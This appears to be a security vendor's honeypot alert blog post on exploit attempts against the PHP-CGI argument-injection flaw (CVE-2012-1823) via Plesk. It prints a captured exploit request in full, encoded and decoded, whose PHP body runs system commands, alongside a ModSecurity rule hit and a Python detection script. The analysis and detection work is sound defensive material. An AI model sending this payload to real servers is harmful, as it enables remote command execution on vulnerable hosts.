Last week, hacker "kingcope" provided PoC exploit code for a Plesk 0-day on the Full Disclosure public mailing list. Our web honeypot systems have since received some exploit attempts, so we wanted to share them with the community. Here is an example request taken from our ModSecurity audit log:
--0cbefd64-A--
[10/Jun/2013:16:01:11 --0500] FI5-@MCo8AoAADlBVOIAAAAX 88.208.233.113 37872 XXX.XXX.XXX.XXX 80
--0cbefd64-B--
POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
--0cbefd64-C--
<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;uptime;exit"); ?>
The path and query-string portion of the URI is percent-encoded. When decoded, it is:
/phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n
This shows an attempt to disable various PHP security settings through -d php.ini overrides, and then to set auto_prepend_file to php://input so that the request body is executed as PHP code and its output is returned in the response page. The request body in section C shows that this request is simply a probe to verify whether the web server is vulnerable. If it were, the server would have responded with the results of the OS commands in that body: uname -a, id and uptime.
ModSecurity users running the OWASP ModSecurity CRS are already protected from this attack. The CRS has many signatures/rules that triggered on this request, including:
Message: Warning. Pattern match "<\\?(?!xml)" at ARGS_NAMES:<?php echo "Content-Type:text/html\\r\\n\\r\\n";echo "OK\\n";system("uname -a;id;uptime;exit"); ?>. [file "/etc/httpd/modsecurity.d/crs/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"]
While there was some public debate about the required Plesk configurations related to Apache ScriptAlias directives, it was determined that the real, underlying issue is the old PHP-CGI vulnerability (CVE-2012-1823). We covered this issue in a previous Honeypot Alert blog post.
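As an added example that is not part of the original post or Trustwave's tooling, the following Python check decodes a request line the way a CGI server would and flags the php-cgi argument injection behind CVE-2012-1823 that the decoded URI above relies on. The sample request lines are constructed, and the check rests on the RFC 3875 rule that a query string containing no unencoded "=" is passed to the CGI program as command-line arguments.

```python
from urllib.parse import unquote

# Constructed sample request lines; the first mirrors the shape of the honeypot request above.
SAMPLE_REQUEST_LINES = [
    "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F"
    "%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64"
    "%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1",
    "GET /index.php?page=home&id=3 HTTP/1.1",
    "GET /search?hello+world HTTP/1.1",
]

# php.ini settings the honeypot request tried to override with -d.
RISKY_INI = {"allow_url_include", "auto_prepend_file", "safe_mode",
             "disable_functions", "open_basedir", "suhosin.simulation"}


def cgi_argv_from_query(raw_query):
    """Split a query string the way a CGI server hands it to argv.

    RFC 3875 section 4.4: a query with no unencoded '=' is split on '+' and passed
    as command-line arguments; encoding '=' as %3D is how the request above slips
    php-cgi options past that rule. Returns [] for an ordinary parameter query.
    """
    if not raw_query or "=" in raw_query:
        return []
    return [unquote(word) for word in raw_query.split("+") if word]


def analyze_request_line(line):
    """Return a finding dict for a php-cgi argument injection attempt, else None."""
    parts = line.split(" ")
    if len(parts) < 2:
        return None
    path, _sep, raw_query = parts[1].partition("?")
    argv = cgi_argv_from_query(raw_query)
    if not argv or not argv[0].startswith("-"):
        return None  # plain search-style query such as ?hello+world
    overrides = {}
    for i, word in enumerate(argv):
        if word == "-d" and i + 1 < len(argv):
            key, _, value = argv[i + 1].partition("=")
            overrides[key] = value
    return {
        "path": unquote(path),
        "argv": argv,
        "ini_overrides": overrides,
        "risky_overrides": sorted(k for k in overrides if k in RISKY_INI),
        # php://input as auto_prepend_file makes the POST body run as PHP code
        "prepends_request_body": overrides.get("auto_prepend_file") == "php://input",
    }
```

A WAF rule gets the same signal more cheaply by matching a query string that starts with an encoded dash and contains no literal "=", but the decoded argv is what tells an analyst which settings the probe tried to change.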